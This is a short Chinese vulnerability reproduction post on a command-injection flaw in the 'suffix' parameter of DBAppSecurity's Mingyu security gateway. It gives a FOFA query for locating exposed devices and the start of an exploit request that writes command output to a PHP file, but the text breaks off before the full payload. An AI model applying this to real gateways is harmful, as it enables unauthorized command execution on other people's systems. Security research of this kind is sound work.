安恒明御网关suffix命令执行漏洞
阅读须知
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
漏洞简介
安恒明御网关suffix存在命令执行漏洞。
FOFA语法
title="明御安全网关"
漏洞复现
执行df命令至anhengngfw.php,得到回显
GET请求以下地址,第一次写入内容到check.php,第二次请求check.php检测是否写入
/webui/?g=aaa_portal_auth_local_submit&